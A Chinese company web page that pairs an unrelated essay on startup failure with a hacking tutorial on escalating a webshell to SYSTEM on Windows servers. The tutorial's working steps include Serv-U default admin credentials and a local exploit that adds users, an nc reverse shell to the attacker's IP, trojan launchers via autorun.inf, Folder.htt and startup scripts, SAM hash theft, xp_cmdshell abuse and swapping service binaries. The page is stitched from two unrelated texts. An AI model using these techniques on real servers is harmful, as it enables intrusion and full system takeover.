艾銻知識(shí) | 服務(wù)器 提權(quán)方法大全

2020-03-10 15:13 作者：艾銻無(wú)限 瀏覽量：

據(jù)不完全統(tǒng)計(jì),中國(guó)有近5000萬(wàn)家中小微企業(yè),這個(gè)數(shù)據(jù)隨著互聯(lián)網(wǎng)的發(fā)展還在持續(xù)增長(zhǎng),但這些企業(yè)的存活率是非常低的,60%的初創(chuàng)企業(yè)活不過(guò)1年,30%的初創(chuàng)企業(yè)活不過(guò)3年,還有超過(guò)9%的企業(yè)只有5年左右的生存期,剩下不到1%的企業(yè)活過(guò)5年以上,幸運(yùn)的可以達(dá)到10年,甚至更長(zhǎng)一些.

為什么中小微企業(yè)的存活率這么低呢?

透過(guò)成千上萬(wàn)的失敗案例,我們總結(jié)了以下五大方面的原因:

第一,創(chuàng)業(yè)失敗創(chuàng)始人難辭其咎,我們?cè)趯W(xué)校里是沒(méi)有一堂課是教如何創(chuàng)業(yè),如何才能創(chuàng)業(yè)成功,即使現(xiàn)在有很多大學(xué)嘗試著在學(xué)校開(kāi)辦一些創(chuàng)業(yè)的課程,也不系統(tǒng),更不專業(yè),因?yàn)閯?chuàng)業(yè)是一件極其復(fù)雜的工作,是需要多項(xiàng)技能的集合以及熟練的運(yùn)用才有可能應(yīng)對(duì)突如其來(lái)的變化,創(chuàng)業(yè)初期就像一艘孤獨(dú)的小船面對(duì)波濤洶涌的大海,但船長(zhǎng)從來(lái)都沒(méi)有開(kāi)過(guò)任何一艘船駛出過(guò)海港,風(fēng)浪來(lái)的時(shí)候,只有慌張和恐懼,最后被海水吞沒(méi).

第二,創(chuàng)業(yè)失敗是價(jià)值觀不統(tǒng)一,方向不一致,團(tuán)隊(duì)不團(tuán)結(jié),風(fēng)平浪靜,風(fēng)和日麗,其實(shí)沒(méi)什么關(guān)系,大家都在享受陽(yáng)光帶來(lái)的美好和快樂(lè),只有遇到風(fēng)浪,生死攸關(guān)或個(gè)人利益受到極大沖突時(shí),人性的弱點(diǎn)才會(huì)突顯,當(dāng)每個(gè)人只盯著個(gè)人得失或眼光短淺時(shí),如果這個(gè)時(shí)候創(chuàng)始人沒(méi)有力挽狂瀾,強(qiáng)大的信念和人格魅力來(lái)一統(tǒng)所有人的行動(dòng)準(zhǔn)則,在危機(jī)中遲疑,就等于在死神面前跳舞,當(dāng)年阿里的“中國(guó)供應(yīng)商”客戶涉嫌欺詐事件,如果不是馬云明察秋毫,當(dāng)即立斷,我相信也不會(huì)有今天阿里世界霸主的地位.

第三,創(chuàng)業(yè)失敗是固步自封,看不見(jiàn)高山,如果我們只能看見(jiàn)自己的山最高,沒(méi)有走出去,沒(méi)有學(xué)習(xí)的心態(tài),沒(méi)有敬畏之心,很快時(shí)代就會(huì)把我們淘汰,當(dāng)年的諾基亞,柯達(dá)就是最好的例子.無(wú)論企業(yè)多大,都要有一顆創(chuàng)業(yè)的心,永遠(yuǎn)相信還能做的更好,還可以再創(chuàng)新,還會(huì)想出其它的可能性.真正的對(duì)手不在外面,而在我們心中,心中無(wú)敵,才能無(wú)敵于天下.

第四,創(chuàng)業(yè)失敗是誤解了”客戶是上帝”,上帝并不是時(shí)時(shí)都知道自己要什么,我們不能只限于客戶表面的表達(dá)就決定了他們的需求,很多企業(yè)死就死在客戶的假需求中,看起來(lái)好像是客戶追求的產(chǎn)品,需要的服務(wù),但實(shí)際當(dāng)產(chǎn)品生產(chǎn)出來(lái),當(dāng)服務(wù)送到客戶面前,并沒(méi)有真正吸引到客戶的注意,愿意為此而買(mǎi)單,核心本質(zhì)就是我們曲解了”客戶是上帝”這句話,真正的上帝是不會(huì)當(dāng)自己是至高無(wú)上的,也不會(huì)對(duì)品質(zhì)無(wú)底限的追求,更不會(huì)對(duì)服務(wù)沒(méi)有節(jié)制要求,其實(shí)客戶就是客戶,他們絕大部分人都是普通人,有著普通人的欲望,有著普通人的不滿足,有著普通人想要花更少的錢(qián)卻要得到更多的意識(shí),他們的只忠誠(chéng)于更便宜更高的品質(zhì),這一切都是企業(yè)需要認(rèn)知到的本質(zhì),不然你的”上帝”是不會(huì)為你持續(xù)付費(fèi)的.

第五,創(chuàng)業(yè)失敗是講多了人情講少了制度,公司小,三五個(gè)人可以不需要任何制度,甚至也不需要任何系統(tǒng),因?yàn)槟菚r(shí)彼此聯(lián)結(jié)非常深,情感的能量可以喚醒每個(gè)人的斗志和決心 ,但當(dāng)企業(yè)發(fā)展到幾十個(gè)人甚至幾百個(gè)人時(shí),那種深深的聯(lián)結(jié)感很難在感受到,人性的弱點(diǎn)就會(huì)被環(huán)境所喚醒,就會(huì)被利益所綁架,就會(huì)被自私所控制,但也不是有了制度就有了保障,制度是人的工具,制度最終是服務(wù)于人,只有促進(jìn)發(fā)展的制度,可能激勵(lì)人性向善的制度才能長(zhǎng)久, 反之亦然.

如果你想想創(chuàng)立一家公司?

如果你是一家剛剛開(kāi)始創(chuàng)業(yè)的公司?

如果你現(xiàn)在在創(chuàng)業(yè)的過(guò)程中遇到了挑戰(zhàn)?

結(jié)合上面的五大常見(jiàn)創(chuàng)業(yè)失敗,我們總結(jié)出來(lái)了五個(gè)可以讓你有更大成功機(jī)率的法則,可以讓你活的更久一些,但不保證你一定成功,因?yàn)槭率伦兓?因緣和合,萬(wàn)法無(wú)常,只能隨機(jī)而變.

第一法則:準(zhǔn)備自己

創(chuàng)始人需要自我審視,首先要準(zhǔn)備好自我犧牲的精神,要做好大海有風(fēng)暴的思想準(zhǔn)備,其次利用一切可以實(shí)踐的機(jī)會(huì)去鍛煉自己的綜合能力,不僅僅相信前輩和書(shū)本的聲音,更需要相信實(shí)戰(zhàn)后帶來(lái)的思考和反思.即要有遠(yuǎn)大的理想和抱負(fù),又要有腳踏實(shí)地做好每一件事的決心.

第二法則:認(rèn)識(shí)自我

創(chuàng)始人要極早的認(rèn)識(shí)自我,想清楚為什么要?jiǎng)?chuàng)業(yè)比創(chuàng)業(yè)更重要,清晰明確的了解自己的價(jià)值是什么?什么是自己會(huì)堅(jiān)持的,什么是自己抗拒的,混亂的價(jià)值觀就會(huì)吸引五花八門(mén)的人,企業(yè)內(nèi)部的斗爭(zhēng)都是創(chuàng)始人自己思想的斗爭(zhēng),初創(chuàng)企業(yè)所呈現(xiàn)出來(lái)的一切現(xiàn)象都是創(chuàng)始人內(nèi)在的顯化.當(dāng)年阿里快速成長(zhǎng),內(nèi)部也出現(xiàn)了一系列的問(wèn)題,但極其智慧的馬云沒(méi)有去解決這些問(wèn)題,反而把自己關(guān)在道觀中整整7天,最后終于想明白了三個(gè)問(wèn)題:我要什么,我有什么,我要放棄什么,當(dāng)他想清晰這三個(gè)問(wèn)題后,并向全公司傳遞出來(lái),最后所有那些紛繁復(fù)雜的問(wèn)題都不解自明.

第三法則:持續(xù)打開(kāi)

創(chuàng)始人的天花板就是企業(yè)的天花板,企業(yè)無(wú)法突破,就是創(chuàng)始人沒(méi)有突破自己,突破其實(shí)不容易,因?yàn)楣逃械挠^念就像萬(wàn)里長(zhǎng)城一樣,非一日之功,是多少個(gè)春夏秋冬,嚴(yán)寒酷暑的積累和沉淀,這些不是沒(méi)有價(jià)值,而是幫助過(guò)我們創(chuàng)了價(jià)值,讓我們來(lái)到了今天這一步,但如果我們期望有一個(gè)更大的世界,就需要放下它們,放下我們?cè)?jīng)一直的堅(jiān)持和執(zhí)著,打開(kāi)自己,讓自己接納一個(gè)全新的可能性,也許過(guò)不了多久,我們又會(huì)把這些新的東西奉為圭臬但只要我們還想看到一個(gè)更大的可能性,就需要再次打開(kāi)自己,重新建立認(rèn)知,我們一生都是在打開(kāi)和重建過(guò)程中,直到生命的終結(jié),又一切回歸原點(diǎn).

第四法則:回歸本質(zhì)

創(chuàng)始人剛開(kāi)始需要和團(tuán)隊(duì)一起參與戰(zhàn)斗,甚至做具體細(xì)節(jié)工作,因?yàn)槌鮿?chuàng)需要激情來(lái)點(diǎn)燃,而創(chuàng)始人是這個(gè)團(tuán)隊(duì)最有激情的一個(gè)人,初創(chuàng)團(tuán)隊(duì)需要有人帶動(dòng)去點(diǎn)燃更大的燃料.當(dāng)所有團(tuán)隊(duì)和部門(mén)走向正軌時(shí),創(chuàng)始人更大的價(jià)值是深度的思考,有效的區(qū)分,精神的引領(lǐng)和正確的選擇.

企業(yè)越來(lái)越大,事情就會(huì)越來(lái)越多,如果沒(méi)有一個(gè)清醒的大腦保持深度的思考,就像讓企業(yè)很多人很忙,忙是一種現(xiàn)象,并不代表有價(jià)值,只有透過(guò)深度思考發(fā)現(xiàn)事物的本質(zhì),才知道忙什么才是最重要的,

懂得有效的區(qū)分是一個(gè)領(lǐng)導(dǎo)者必須掌握的能力, 《尼布爾的祈禱文》說(shuō):”上帝，請(qǐng)賜予我平靜，去接受我無(wú)法改變的。給予我勇氣，去改變我能改變的，賜我智慧，分辨這兩者的區(qū)別。”只有具備分辨的智慧,才不會(huì)讓自己誤入歧途.

創(chuàng)始人要有強(qiáng)大的精神力量,讓所有員工感受到這股力量,因?yàn)樗械某晒Χ茧x不開(kāi)一個(gè)偉大的精神領(lǐng)袖,就像蘋(píng)果的喬布斯,微軟的比爾蓋茨和阿里的馬云.

選擇比努力更重要,這句話告訴我們順勢(shì)而為的選擇可以讓我們?cè)谕瑯拥呐η闆r下獲得不同的結(jié)果,如何才能具備這樣明智選擇的能力呢,強(qiáng)大的深度思考能力和有效的區(qū)分能力就可以幫到我們看見(jiàn)正確的選擇.

第五法則:創(chuàng)造系統(tǒng)

創(chuàng)始人是人,是人就會(huì)有七情六欲,就會(huì)有生老病死,就會(huì)有悲歡離合,這些人性的因素會(huì)讓我們很不穩(wěn)定,但企業(yè)能持久有效的運(yùn)轉(zhuǎn)一定是在穩(wěn)定的能量下運(yùn)行,所以不能始終靠人來(lái)推動(dòng),企業(yè)想要活的久一定是有內(nèi)生的系統(tǒng),只有建立一個(gè)自動(dòng)運(yùn)轉(zhuǎn)的系統(tǒng)才能保持穩(wěn)定健康的成長(zhǎng).

以上的分享像從管子里看豹，只看見(jiàn)豹身上的一塊花斑，看不到全豹,以此拋磚引玉,希望有更多人可以把自己創(chuàng)業(yè)的經(jīng)歷和經(jīng)驗(yàn)分享出來(lái),從而讓我們更全面的看見(jiàn)一家企業(yè)怎樣做才能活得久,活的好,活的更有價(jià)值.

艾銻知識(shí) |服務(wù)器 提權(quán)方法大全

現(xiàn)在可以說(shuō)網(wǎng)絡(luò)管理員對(duì)服務(wù)器的設(shè)置是越來(lái)越BT，但BT的同時(shí)，也有黑客朋友們對(duì)服務(wù)器的不斷的測(cè)試，在測(cè)試中往往獲取最低的guest權(quán)限是簡(jiǎn)單的，像我們?cè)谌肭志W(wǎng)站過(guò)程中，獲取webshell是簡(jiǎn)單的，但是當(dāng)由webshell的guest權(quán)限向system權(quán)限提升時(shí)卻往往是止步不前。所以我有想寫(xiě)這樣一篇文章的想法，但是在思考的過(guò)程中，又不得不承認(rèn)，方法是不斷的探索中出來(lái)的，方法更是有常規(guī)的也有另辟蹊徑的。下面就做一些簡(jiǎn)單的介紹，對(duì)提權(quán)的方法進(jìn)行一些介紹，同時(shí)也希望在更多朋友的不斷回復(fù)中能夠豐富我們的方法。

首先要說(shuō)明的是，過(guò)早的一些漏洞我們就不再多說(shuō)了，只說(shuō)一些現(xiàn)在可以見(jiàn)到的吧。還有就是本文的題目是webshell下的服務(wù)器提權(quán)方法。

下面我們就進(jìn)入主題，對(duì)webshell的提權(quán)方法！

首先我們要明確的是，提權(quán)一般是依靠主機(jī)所開(kāi)通的服務(wù)，利用服務(wù)存在的漏洞和管理員設(shè)置的疏忽進(jìn)行提權(quán)的，不過(guò)也不排除一些SB的管理員對(duì)服務(wù)器設(shè)置的似乎沒(méi)有"穿衣服".下面就是針對(duì)一些常見(jiàn)的服務(wù)進(jìn)行的提權(quán)方法。
在獲取webshell后，我們常見(jiàn)的是看一下系統(tǒng)的服務(wù)，查看服務(wù)可以通過(guò)利用掃描器對(duì)服務(wù)器ip進(jìn)行掃描，或是在webshell中有執(zhí)行dos命令時(shí)查看net start來(lái)查看主機(jī)所開(kāi)放的服務(wù)。首先我們說(shuō)一下從簡(jiǎn)單的開(kāi)始說(shuō)起：

1。pcanywhere的提權(quán)方法

pcanywhere軟件我想大家都了解，為什么將它放在首位就是因?yàn)樽x取密碼后直接連接就可以了，如果對(duì)方主機(jī)在開(kāi)通了pcanywhere的服務(wù)端的話，我們看能否跳轉(zhuǎn)到這個(gè)目錄C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\，如果行那就最好了，直接下載它的CIF文件，然后使用pcanywhere的密碼讀取器得到pcAnywhere密碼，然后使用pcanywhere登陸即可!接下來(lái)就是可視化操作了。

2。Serv-U提權(quán)方法

Serv-u可以說(shuō)是網(wǎng)絡(luò)上比較火的一款FTP服務(wù)器軟件，有許多像我這樣的小黑們都是看系統(tǒng)服務(wù)中是否有Serv-u的系統(tǒng)進(jìn)程來(lái)進(jìn)行提權(quán)的。Serv-u的提權(quán)方法針對(duì)不同的版本也有不同的方法，這里我們就列舉一二，可能不是很全，但在其他網(wǎng)友的回復(fù)中能夠不斷的補(bǔ)充吧！

a.serv-U本地提權(quán):serv-U本地提權(quán)一般是利用溢出程序?qū)erv-u的設(shè)置上的缺陷進(jìn)行添加超級(jí)賬戶的功效。例如Xiaolu寫(xiě)的serv-u.exe就是利用sevr-u的默認(rèn)管理端口，管理員賬號(hào)和密碼進(jìn)行提權(quán)的，默認(rèn)本地管理端口是：43958，默認(rèn)管理員：LocalAdministrator，默認(rèn)密碼：#l@$ak#.lk;0@P，這是集成在Serv-u內(nèi)部的，可以以Guest權(quán)限來(lái)進(jìn)行連接，對(duì)Serv-u進(jìn)行管理，利用本地提權(quán)的關(guān)鍵就是尋找服務(wù)器文件目錄中的everyone權(quán)限目錄，下面我給大家列舉些常見(jiàn)的everyone權(quán)限目錄：

c:\winnt\system32\inetsrv\data\

是erveryone 完全控制，很多時(shí)候沒(méi)作限制，把提升權(quán)限的工具上傳上去，然后執(zhí)行

c:\prel

C:\Program Files\Java Web Start\

c:\Documents and Settings\

C:\Documents and Settings\All Users\Documents\

很多時(shí)候data目錄不行，試試這個(gè)很多主機(jī)都是erveryone 完全控制！

C:\Program Files\Microsoft SQL Server\

c:\Temp\

c:\mysql\(如果服務(wù)器支持PHP）

c:\PHP(如果服務(wù)器支持PHP）

上面一些目錄就是常見(jiàn)的，不過(guò)也不排除一些特殊的，像江民的kv2004對(duì)文件夾的權(quán)限設(shè)置就不是很嚴(yán)格的。

不過(guò)針對(duì)本地提權(quán)是可以防范的，下面是我在xiaolu的文章中節(jié)選的：

防止辦法和對(duì)策：

一般防止方法：設(shè)置目錄權(quán)限，通過(guò)去掉Web目錄iusr用戶的執(zhí)行權(quán)限來(lái)防止使用Webshell來(lái)運(yùn)行Exp程序。

對(duì)策：這種方法有一定的局限性，需要設(shè)置的目錄很多，不能有一點(diǎn)疏漏，比如我就發(fā)現(xiàn)很多虛擬主機(jī)在C:\Documents and Settings\All Users\ Documents目錄以及下邊幾個(gè)子目錄Documents沒(méi)有設(shè)置權(quán)限，導(dǎo)致可以在這個(gè)目錄上傳并運(yùn)行Exp，這種目錄還有x:\php,x:\perl等，因?yàn)檫@種目錄都是
everyone完全控制的。有些主機(jī)還支持php,pl,aspx等，這簡(jiǎn)直就是服務(wù)器的Serv-U災(zāi)難，^_^，運(yùn)行程序更加方便。

高級(jí)一點(diǎn)的防止辦法：修改Serv-u管理端口，用Ultraedit打開(kāi)ServUDaemon.exe查找B6AB(43958的16進(jìn)制)，替換成自己定義的端口比如3930（12345），打開(kāi)ServUAdmin.exe找到最后一個(gè)B6AB替換成3930（12345）,啟動(dòng)Serv-u，現(xiàn)在本地管理端口就成了12345了：

TCP 127.0.0.1:12345 0.0.0.0:0 LISTENING

對(duì)策：對(duì)付這種也很簡(jiǎn)單，netstat –an,就能看到端口了，有人說(shuō)netstat無(wú)法運(yùn)行，其實(shí)你再上傳個(gè)netstat.exe到可執(zhí)行目錄運(yùn)行就ok了，然后修改一下Exp編譯，上傳運(yùn)行就好了，我修改了一個(gè)可以自定義端口的Exp,運(yùn)行格式：

USAGE: serv-u.exe port "command"

Example: serv-u.exe 43958 "net user xl xiaoxue /add"

更高級(jí)的防止辦法：修改管理員名和密碼，用Ultraedit打開(kāi)ServUDaemon.exe查找Ascii：LocalAdministrator，和#l@$ak#.lk;0@P，修改成等長(zhǎng)度的其它字符就可以了，ServUAdmin.exe也一樣處理。

對(duì)策：這下默認(rèn)的管理員連接不上了，還有辦法么？嘿嘿，有的管理員安裝Serv-u都是使用默認(rèn)目錄C:\Program Files\Serv-U安裝，這個(gè)目錄雖然不能寫(xiě)，也不能修改，但是默認(rèn)iusr是可以讀的，我們可以用webshell來(lái)下載ServUDaemon.exe，用Ultraedit打開(kāi)分析一下，Serv-U的帳號(hào)密碼就到手

了，修改Exp編譯上傳運(yùn)行，我們又勝利了。

終極防御：

a.設(shè)置好目錄權(quán)限，不要疏忽大意；

b.Serv-U最好不要使用默認(rèn)安裝路徑，設(shè)置Serv-U目錄的權(quán)限，只有管理員才能訪問(wèn)；

c.用我介紹的辦法修改Serv-U的默認(rèn)管理員名字和密碼，喜歡的話端口也可以改掉。

d.serv-U管理端口定向轉(zhuǎn)發(fā)法：這里需要使用的工具是FPipe.exe

我們要知道Serv-u默認(rèn)本地管理端口是：43958,這個(gè)是只允許本地ip127.0.0.1進(jìn)行登陸和管理的，那么我們就想能不能通過(guò)端口轉(zhuǎn)向來(lái)遠(yuǎn)程管理呢？所以我們用到FPipe.exe，首先是將FPipe.exe上傳至服務(wù)器中，然后再cmd下執(zhí)行

Fpipe.exe -v -l 12345-r 43958 127.0.0.1

這里要說(shuō)明的是，這段字符的意思是當(dāng)訪問(wèn)12345端口時(shí)就會(huì)自動(dòng)轉(zhuǎn)向43958端口，也就是serv-u的管理端口

所以我們?cè)诒镜匕惭b一個(gè)Serv-u，

新建一個(gè)服務(wù)器，填入對(duì)方IP，

user:

LocalAdministrator

pass:

#l@$ak#.lk;0@P

連接上后你就可以管理他的Serv-u了，剩下的操作就是執(zhí)行上面提到的方法了！

===================================================

Serv-U的方法我就總結(jié)出這幾個(gè)來(lái)，可能還有其他的方法我沒(méi)有看到吧

不過(guò)個(gè)人認(rèn)為關(guān)鍵還是本地溢出漏洞的應(yīng)用要比較多一些，所以網(wǎng)上也常常出現(xiàn)serv-u的本機(jī)溢出程序

不同版本的更是層出不窮，前一段時(shí)間針對(duì)serv-u6.0.2的修改了默認(rèn)管理員賬號(hào)和密碼的相關(guān)文章還請(qǐng)大家參照校園黑客聯(lián)盟的小魚(yú)修煉中的文章。

Serv-U的提權(quán)文章就暫時(shí)先總結(jié)到這里，有更好的方法還請(qǐng)大家回復(fù)！



3.Autorun方法：這種方法也可以說(shuō)是比較古老的方法，最初應(yīng)該是從光盤(pán)自動(dòng)播放中尋找到的靈感吧？不進(jìn)行細(xì)說(shuō)，給出格式即可

制作一個(gè)Autoruan.inf文件.內(nèi)容如下

[AutoRun]

open=bear.exe

bear.exe為木馬程序，與autorun.inf放在同一目錄下！



4。SAM破解方法： 進(jìn)入C:\WINNT\system32\config\ 下載他的SAM文件用lc等破解工具破解。



5。相關(guān)腳本提權(quán)方法：前面的serv-u的ftp提權(quán)中提過(guò)的vbs這里再說(shuō)下.進(jìn)入c:\Documents and Settings\All Users\「開(kāi)始」菜單\程序\啟動(dòng) 寫(xiě)入bat或vbs文件。這種方法也是屬于守株待兔類的，只有在對(duì)方主機(jī)重起以后才可以達(dá)到目的。


6。NC的反彈提權(quán)：這里就要說(shuō)NC的相關(guān)用法了，如果在對(duì)方服務(wù)器中有足夠的權(quán)限執(zhí)行nc的話就好了，把它反彈到自己的電腦上，你就可以進(jìn)行相關(guān)操作了！瑞士軍刀具體方法不多說(shuō)，給出格式，如下：

server:nc -e cmd.exe ip 1234

client: nc -l -p 1234



7。conn等asp文件中泄漏SQL帳戶密碼方法：這種方法說(shuō)起來(lái)應(yīng)該算是比較僥幸的方法。曾經(jīng)馬俊和我說(shuō)過(guò)一次，原來(lái)沒(méi)有太在意，現(xiàn)在還真的感覺(jué)有些好用了，找到賬號(hào)密碼和數(shù)據(jù)庫(kù)名在對(duì)方?jīng)]有刪除xp_cmdshell條件下用sql連接工具連接即可，連接上后就可以輸入你想要的CMD命令了。


8。VNC的相關(guān)提權(quán)：VNC也是一個(gè)類似pcanywhere的遠(yuǎn)程管理軟件，在linux應(yīng)用廣泛，曾經(jīng)在看臺(tái)灣的一些服務(wù)器中有很多使用VNC的，方法也是我在網(wǎng)絡(luò)中學(xué)到的，不過(guò)在應(yīng)用中就成功過(guò)一次，比較郁悶！方法就轉(zhuǎn)載一下吧，網(wǎng)址：http://www.hxhack.org/Article/HTML/14184.html

還有要補(bǔ)充的就是vnc是可以反向連接的，這個(gè)方法我沒(méi)有試過(guò)，只是曾經(jīng)看影子做過(guò)一個(gè)視頻動(dòng)畫(huà)。


9。desktop.ini與Folder.htt方法。（此方法是在網(wǎng)絡(luò)看到的）方法如下：首先建立一個(gè)文件夾，進(jìn)入，在空白處點(diǎn)右鍵，選擇“自定義文件夾”一直下點(diǎn)，默認(rèn)即可。完成后，你就會(huì)看到在此目錄下多了兩個(gè)名為Folder

setting的文件架與desktop.ini的文件，如果看不到，就把顯示所有文件給選上，然后我們?cè)贔older setting目錄下找到Folder.htt文件，記事本打開(kāi)，在任意地方加入以下代碼：<OBJECT ID=“RUNIT” WIDTH=0 HEIGHT=0 TYPE=”application/x-oleobject” CODEBASE=“木馬名”></OBJECT> 然后你將
你的木馬文件放在Folder setting目錄下，把此目錄與desktop.ini一起上傳到對(duì)方任意一個(gè)目錄下，就可以了，只要等管理員瀏覽了此目錄，它就執(zhí)行了我們的木馬，此方法也屬于類似autorun的守株待兔方法。

10。替換服務(wù)提權(quán)：我認(rèn)為比較復(fù)雜，不過(guò)有些時(shí)候也實(shí)用，首先是看服務(wù)進(jìn)程，在看我們是否有執(zhí)行命令的權(quán)限，這里要用到的命令是rename，相關(guān)用法：

C:\>rename /?

重命名文件。

RENAME [drive:][path]filename1 filename2.

REN [drive:][path]filename1 filename2.


例如替換c:\kv2004\kv.exe的進(jìn)程

rename c:\kv2004\kv.exe bear.exe

然后再將我們的本地木馬文件命名為kv.exe上傳到c:\kv2004\目錄下，等待對(duì)方重新起動(dòng)機(jī)算機(jī)即可！